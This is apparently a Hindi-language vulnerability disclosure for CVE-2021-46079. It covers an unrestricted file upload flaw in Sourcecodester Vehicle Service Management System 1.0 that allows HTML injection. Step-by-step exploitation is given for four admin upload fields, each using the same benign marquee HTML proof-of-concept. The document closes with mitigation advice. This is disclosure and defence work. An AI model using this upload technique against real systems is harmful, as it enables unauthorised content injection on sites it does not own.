CVE-2021-46079
शोषण शीर्षक: व्हीकल सर्विस मैनेजमेंट सिस्टम - 'एकाधिक' फ़ाइल अपलोड से एचटीएमएल इंजेक्शन
CVE: CVE-2021-46079
CVSS: 7.2 उच्च
संदर्भ:
विवरण:
Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड कमजोरी मौजूद है। एक दूरस्थ हमलावर HTML इंजेक्शन की ओर ले जाने वाली दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है।
1. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'MyAccount' (/admin/?page=user)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
- मेरे खाता अनुभाग http://localhost/vehicle_service/admin/?page=user पर जाएं
पेलोड:
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
- मेरे खाता अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- अवतार छवि को एक नए टैब में खोलें।
- HTML इंजेक्शन निष्पादित होता है।
2. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'User List' (/admin/?page=user/manage_user)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
- उपयोगकर्ता सूची अनुभाग पर जाएं और नया बनाएं बटन पर क्लिक करें।
पेलोड:
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
- नया उपयोगकर्ता बनाएं पृष्ठ में सभी आवश्यक विवरण दर्ज करें और अवतार में HTML फ़ाइल ब्राउज़ करें।
- सहेजें बटन पर क्लिक करें।
- अवतार छवि को एक नए टैब में खोलें।
- HTML इंजेक्शन निष्पादित होता है।
3. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-System Logo' (/admin/?page=system_info)
पेलोड:
- एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
- सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएं
पेलोड:
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
- सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और सिस्टम लोगो में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- सिस्टम लोगो छवि को एक नए टैब में खोलें।
- HTML इंजेक्शन निष्पादित होता है।
4. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-Website Cover' (/admin/?page=system_info)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin पर लॉगिन करें
- सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएं
पेलोड:
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- उपरोक्त HTML कोड को उदा. Html Injection.html के रूप में सहेजें
- सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और वेबसाइट कवर में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- वेबसाइट कवर छवि को एक नए टैब में खोलें।
- HTML इंजेक्शन निष्पादित होता है।
प्रभाव:
एक हमलावर कई एंडपॉइंट पर दुर्भावनापूर्ण फ़ाइल अपलोड करने में सक्षम होता है, जिससे HTML इंजेक्शन होता है।
शमन:
निम्नलिखित को लागू करने की अनुशंसा की जाती है:
- बिना व्हाइट-लिस्ट फ़िल्टर के कभी भी किसी फ़ाइल नाम और उसके एक्सटेंशन को सीधे स्वीकार न करें।
- यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट स्वीकार करने की अत्यधिक अनुशंसा की जाती है।
- सेवा अस्वीकार हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
- अपलोड की गई निर्देशिका में कोई "निष्पादित" अनुमति नहीं होनी चाहिए।
- केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।